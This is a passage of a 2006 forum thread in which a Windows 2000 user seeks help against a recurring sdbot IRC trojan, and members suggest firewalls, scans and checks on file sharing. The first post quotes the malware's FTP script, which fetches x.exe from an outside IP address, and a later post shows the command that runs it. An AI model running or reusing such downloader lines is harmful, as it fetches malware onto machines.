homepage Welcome to WebmasterWorld Guest from 54.226.10.234
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Pubcon Platinum Sponsor 2014
Home / Forums Index / Microsoft / Microsoft Windows OS (XP/NT/Vista/Windows 7/8/9/10)
Forum Library, Charter, Moderators: bill

Microsoft Windows OS (XP/NT/Vista/Windows 7/8/9/10) Forum

This 33 message thread spans 2 pages: 33 ( [1] 2 > >     
How to Block IRC on Windows 2000?
Is there a way to turn off/ prohibit IRC on windows?
lmo4103

5+ Year Member



 
Msg#: 3116265 posted 2:26 am on Oct 11, 2006 (gmt 0)

Trojan irc.sdbot2 keeps planting files x.exe. i, a in system32
Grissoft keeps catching it.

I open the file i in system32 with notepad and it has:
open 218.63.173.251 6497
user 1 1
get x.exe
quit

This on a fresh installation of windows 2000.
I have internet explorer security setting as high as it will go.
I am on the internet as a restricted user.
Even if I am not topuching the pc, after a while it pops up again.

I just want to block unwanted files being deposited on my computer.

 

kaled

WebmasterWorld Senior Member kaled us a WebmasterWorld Top Contributor of All Time 10+ Year Member



 
Msg#: 3116265 posted 10:08 am on Oct 11, 2006 (gmt 0)

This on a fresh installation of windows 2000.

I assume you mean you reformatted and started again. If you simply reinstalled over the top this would almost never kill a virus, etc.

Assuming it was a clean reinstall, you obviously made the same mistake and got infected again.

1) You need to perform a complete antivirus scan.
2) Ditch Internet Explorer and use Opera or Firefox.
3) You probably need to install firewall software - ZoneAlarm is popular.

If you use this computer for banking or even buying stuff with credit cards, a complete scrub clean is advisable, however, before you do that, download Firefox, ZoneAlarm and AVG onto a cd or flash drive so that you can install them before connecting to the internet.

Kaled.

lmo4103

5+ Year Member



 
Msg#: 3116265 posted 1:15 pm on Oct 11, 2006 (gmt 0)

reformatted and started again

Yes!

The system takes up 2.6GB which includes a 2GB pagefile.sys.

And I know that I could use firefox.
Even if I am not touching the pc, after a while it pops up again

I know that I can try installing all kinds of software.
I know that I can (and do) use linux instead.

I have AVG anti-virus and AVG anti-spyware (formerly Ewido) installed.

But I want to know, on windows, how to turn off the service, port, or whatever that lets this IRC trojan guy plant stuff on my system.

kaled

WebmasterWorld Senior Member kaled us a WebmasterWorld Top Contributor of All Time 10+ Year Member



 
Msg#: 3116265 posted 1:41 pm on Oct 11, 2006 (gmt 0)

Have you disabled Messenger? Is that what you're after?

Kaled.

lmo4103

5+ Year Member



 
Msg#: 3116265 posted 2:22 pm on Oct 11, 2006 (gmt 0)

Yep. First thing I did was disable messenger.
AdministrativeTools->Services->Messenger [Stop / StartupType(manual)]

Nope, not what I was after.

Philosopher

WebmasterWorld Senior Member 10+ Year Member



 
Msg#: 3116265 posted 2:52 pm on Oct 11, 2006 (gmt 0)

Whether it was a fresh installation or whatever, you are infected with a trojan. Specifically backdoor.irc.sdbot or a variation of it.

How did you get infected with the trojan on a fresh install? How old is the install? By that I mean, did you JUST format and reinstall or has it been a week or two? Somehow, somewhere you got infected.

Blocking IRC is simple enough, but you will need some type of firewall either hardware or software (such as zone alarm as was already recommended), but the reality is you have a trojan and need to get rid of that.

You are running an antivirus, but it sounds to me as if your system was either already infected when you installed the antivirus or your AV program isn't picking up the trojan. It's picking up it's attempt to write to the system32 directory, but not the original trojan itself which is what you need to get rid of.

Doing a quick search. I didn't find anything specific for irc.sdbot2

but many things for backdoor.irc.sdbot which leads me to believe what you have may be a variant of the original sdbot trojan.

lmo4103

5+ Year Member



 
Msg#: 3116265 posted 3:18 pm on Oct 11, 2006 (gmt 0)

Less than 24 hrs. old.
And the AVG reported the virus within 30 minutes of the fresh install.
If I didn't know how I got infected with it, how would I know how I got infected with it?

Here is exactly what it says in AVG virus vault:
Trojan horse IRC/BackDoor.SdBot2.JJK
C:\WINNT\System32\x.exe
Moved object
infected

And you are right that a search does not turn up any information on this exact thing.
If you interested in that file - i - in my first post, it is an ftp script and anyone could do:
ftp -n -s:i
to download the stupid x.exe file.

Blocking IRC is simple enough

How can I do it without installing more software?

[edited by: lmo4103 at 3:31 pm (utc) on Oct. 11, 2006]

Philosopher

WebmasterWorld Senior Member 10+ Year Member



 
Msg#: 3116265 posted 3:29 pm on Oct 11, 2006 (gmt 0)

Since neither of us can find any information on that specific variation it is likely that the antivirus prog doens't have the definition for that virus.

Did you have this problem prior to the reinstall or is this new since the format/reinstall?

It could be that you just had REALLY bad luck and got hit with some type of exploit right after you did the fresh install.

Did you download all the windows patches/updates immediately after you did the fresh install or did you wait (or even worse, have you not done that yet)?

My recommendation:

1) Get zone alarm, download it, save it to hard drive or burn it to a cd

2) Take the computer offline and do yet another fresh install. Format, reinstall, everything.

3) Install zone alarm

4) Reconnect and immediately go to windows update and get all the latest updates.

5) Install antivirus

6) Get Firefox and never use IE unless absolutely necessary.

lmo4103

5+ Year Member



 
Msg#: 3116265 posted 3:37 pm on Oct 11, 2006 (gmt 0)

It could be that you just had REALLY bad luck and got hit with some type of exploit right after you did the fresh install.

Did you download all the windows patches/updates immediately after you did the fresh install or did you wait (or even worse, have you not done that yet)?

Yes, bad luck!

I redid this 3 times and 3 times bad luck too!

Hey! At 56k, downloading all the windows patches is 12hrs. solid!
I have ordered SP4 cd.

But there should be a way to gain control of my own computer!

Philosopher

WebmasterWorld Senior Member 10+ Year Member



 
Msg#: 3116265 posted 3:49 pm on Oct 11, 2006 (gmt 0)

I completely agree. Just very hard when your antivirus won't pick up the trojan. You could always try a different antivirus. There are a few free ones out there. Maybe the heuristics in another program would work better at finding the trojan.

Still, 3 times and this happens every time. That is bad...and you are positive you are completely formatting the harddrive one each reinstall?

That is crazy!

A couple of additional thoughts. Is this a standalone computer or is it networked with others that could be infecting it?

Are there any other programs you have installed that could be the source of the trojan? Something you have installed again with each fresh install?

[edited by: Philosopher at 3:59 pm (utc) on Oct. 11, 2006]

youfoundjake

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3116265 posted 4:32 pm on Oct 11, 2006 (gmt 0)

I would recommend doing a reboot into safemode, run a antivirus sweep after the dats are updated, once the scan is complete, trojan found, deleted/removed, unplug the power cable, to kill anything being stored in memory
rinse and repeat as necessary until AV comes up clean
before doing all this, get zone alarm, free edition if you have to.
stop all nonsessential services, messenger, wi-fi, if its a desktop...find a copy of msconfig, since w2k doesn't come with it, get from win98 or winxp
run it, take a look at your startups, and hide all microsoft services and see what services are running.
do you have another working computer? anything you find of suspect on the machine, google it. see what others say about it.
maybe even after installing zonealarm and getting copy of msconfig, updating AV, unplug the computer from internet/network
and do the AV scan with power cord removal each time.

lmo4103

5+ Year Member



 
Msg#: 3116265 posted 5:19 pm on Oct 11, 2006 (gmt 0)

Just very hard when your antivirus won't pick up the trojan.

You didn't read my first post.

Grissoft keeps catching it.

It does catch it!

Is there a way to turn off/ prohibit IRC on windows?

Review:
1.Format partition
2.Install windows 2000 from windows 2000 cd
3.Install Grissoft anti-virus
4.Update virus database
5.Grissoft catches Trojan horse IRC/BackDoor.SdBot2.JJK and puts it in virus vault

[edited by: lmo4103 at 5:25 pm (utc) on Oct. 11, 2006]

Philosopher

WebmasterWorld Senior Member 10+ Year Member



 
Msg#: 3116265 posted 5:22 pm on Oct 11, 2006 (gmt 0)

I read your post just fine..as I said it picks up the attempt to write the new files, but it is NOT picking up the actual trojan and getting rid of it or you wouldn't keep having this problem.

Your AV program is picking up the symptom of the problem, not the cause and that is what you need to get rid of. If it was getting rid of the cause, you wouldn't keep having this problem.

I would try youfoundjakes suggestion and boot into safemode and scan with your AV prog again and see if it finds it that way.

As to the IRC blocking, you can't do it from windows alone. You need a separate program that monitors and blocks internet traffic by blocking specific ports.

[edited by: Philosopher at 5:23 pm (utc) on Oct. 11, 2006]

kaled

WebmasterWorld Senior Member kaled us a WebmasterWorld Top Contributor of All Time 10+ Year Member



 
Msg#: 3116265 posted 6:03 pm on Oct 11, 2006 (gmt 0)

File and printer sharing?
Administrator password null/guessable?
Have you done a full virus scan?

Firewalls exist for a reason. I can see no valid reason for not installing Zone Alarm or a similar program.

If the trojan is being repeatedly installed (and caught by AVG) then either it is being installed directly (for which you must ensure file sharing is suitably blocked and install a firewall) or an attempt is being made periodically to reinstall it either by another process or as scheduled event.

If Zone Alarm does not block these attempts and they continue after a full virus scan, you have no alternative to but to start again, and this time use proper security software from the start.

If you don't want to follow advice, then learn to live with the infection.

Kaled.

lmo4103

5+ Year Member



 
Msg#: 3116265 posted 6:18 pm on Oct 11, 2006 (gmt 0)

Administrator password is not null/ not guessable

Safe Mode -> Full System Scan -> Test Results -> No Virus Found

No Shared Printers / No Shared Folders

youfoundjake

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3116265 posted 7:12 pm on Oct 11, 2006 (gmt 0)

Going out a little bit further, any of the software that you are initially installing, did you get them from the vendor or download off a p2p network? Are you using any key generators for licensing, that could be the culprit.
Download AdAware SE and do a scan in safe mode after updating its definitions as well.
Try and get a copy of hijackthis.exe and post the results here.
Also try scanning with a different AV, maybe NOD32. See what results they yield.
Just out of curiousity, when you format the partition, is it all one partition? or is your hard drive broken up into multiple partitions? What file system are you selecting?
Get zonealarm.

lmo4103

5+ Year Member



 
Msg#: 3116265 posted 7:35 pm on Oct 11, 2006 (gmt 0)

No software installed except Explorer6, Grosoft anti-virus & anti-spyware, hijack-this

Logfile of HijackThis v1.97.7
Scan saved at 3:31:56 PM, on 10/11/2006
Platform: Windows 2000 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\system32\spoolsv.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\system32\MSTask.exe
C:\WINNT\System32\WBEM\WinMgmt.exe
C:\WINNT\Explorer.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
E:\download\searchalot\HijackThis.exe

O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe /STARTUP
O4 - HKLM\..\Run: [!AVG Anti-Spyware] "C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe" /minimized
O9 - Extra button: Related (HKLM)
O9 - Extra 'Tools' menuitem: Show &Related Links (HKLM)
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - [update.microsoft.com...]
O17 - HKLM\System\CCS\Services\Tcpip\..\{092648CB-F073-4C16-A579-6FFF6F5DB46D}: NameServer = 205.152.37.23 205.152.144.23

Downloading zone alarm - 30 minutes left

youfoundjake

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3116265 posted 7:50 pm on Oct 11, 2006 (gmt 0)

The E:\ drive, is that a physical partition, or is that a thumbdrive?
I take it that d:\ is the cdrom?

lmo4103

5+ Year Member



 
Msg#: 3116265 posted 8:00 pm on Oct 11, 2006 (gmt 0)

C:\ drive - windows installation
D:\ drive - hardware device drivers collection
E:\ drive - data files
Safe Mode -> Full System Scan -> Test Results -> No Virus Found

Philosopher

WebmasterWorld Senior Member 10+ Year Member



 
Msg#: 3116265 posted 8:02 pm on Oct 11, 2006 (gmt 0)

when you have done your fresh installs. Are you also formatting the d & e drives? or only the c drive?

[edited by: Philosopher at 8:03 pm (utc) on Oct. 11, 2006]

lmo4103

5+ Year Member



 
Msg#: 3116265 posted 8:05 pm on Oct 11, 2006 (gmt 0)

format c:
I'm not going to format my data.

youfoundjake

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3116265 posted 8:06 pm on Oct 11, 2006 (gmt 0)

Philospher: Exactly my thought also, when you install the OS, and then install AV or any other programs, are they getting installed to D:\ or E:\?

lmo4103

5+ Year Member



 
Msg#: 3116265 posted 8:09 pm on Oct 11, 2006 (gmt 0)

c:\ drive - system plus program files

youfoundjake

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3116265 posted 8:28 pm on Oct 11, 2006 (gmt 0)

Do you have a cd burner or dvd burner, more then one machine? Is there anyway to copy contents of d and e so that those drives can be formatted as well?
Did you get all the apps from the vendor?
Each time that AVG reports the trojan, is it the same filename, or is it changing?

kaled

WebmasterWorld Senior Member kaled us a WebmasterWorld Top Contributor of All Time 10+ Year Member



 
Msg#: 3116265 posted 10:48 pm on Oct 11, 2006 (gmt 0)

No Shared Folders
That's not what I meant. Under Windows NT, etc. the C: drive is notionally shared as C$, etc.

Is file/printer sharing enabled for your internet connection? You need to open the properties dialog for the connection.

Kaled.

youfoundjake

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3116265 posted 1:58 am on Oct 12, 2006 (gmt 0)

Unfortunately when you removing the administrative share of c$ it appears again after the next reboot, unless there is some kind of hack out there, but off the top of my head, I couldn't think of it.

lmo4103

5+ Year Member



 
Msg#: 3116265 posted 11:01 pm on Oct 13, 2006 (gmt 0)

You can certainly remove administrative shares, but at a cost -- I tried that
and many programs no longer worked.

Strange... Nobody can explain IPSec policy to block IRC ports or how to do in TCP.

Waiting for SP4 CDs to arrive....

kaled

WebmasterWorld Senior Member kaled us a WebmasterWorld Top Contributor of All Time 10+ Year Member



 
Msg#: 3116265 posted 12:16 pm on Oct 14, 2006 (gmt 0)

I wasn't suggesting removing administrative sharing. I was pointing out that it is possible to enable/disable file sharing on a specific network connection (i.e. your internet connection).

I doubt that this was the route by which the infection arrived (or continued to reappear) but since it only takes a few seconds to check I thought it was worth pointing out.

Kaled.

lmo4103

5+ Year Member



 
Msg#: 3116265 posted 4:43 pm on Oct 14, 2006 (gmt 0)

enable/disable file sharing on a specific network connection

How?

kaled

WebmasterWorld Senior Member kaled us a WebmasterWorld Top Contributor of All Time 10+ Year Member



 
Msg#: 3116265 posted 12:05 pm on Oct 15, 2006 (gmt 0)

I wrote
Is file/printer sharing enabled for your internet connection? You need to open the properties dialog for the connection.

From the Control Panel, open the Network Connections folder and the open the properties dialog for the network adapter. For Internet access, only the TCP/IP box needs to be ticked.

However, if the same network adapter is used to connect to the Internet and to a local area network, this may not be appropriate.

From memory, using a dialup adapter, you may be prompted to disable sharing but I'm not sure.

Kaled.

This 33 message thread spans 2 pages: 33 ( [1] 2 > >
Global Options:
 top home search open messages active posts  
 

Home / Forums Index / Microsoft / Microsoft Windows OS (XP/NT/Vista/Windows 7/8/9/10)
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved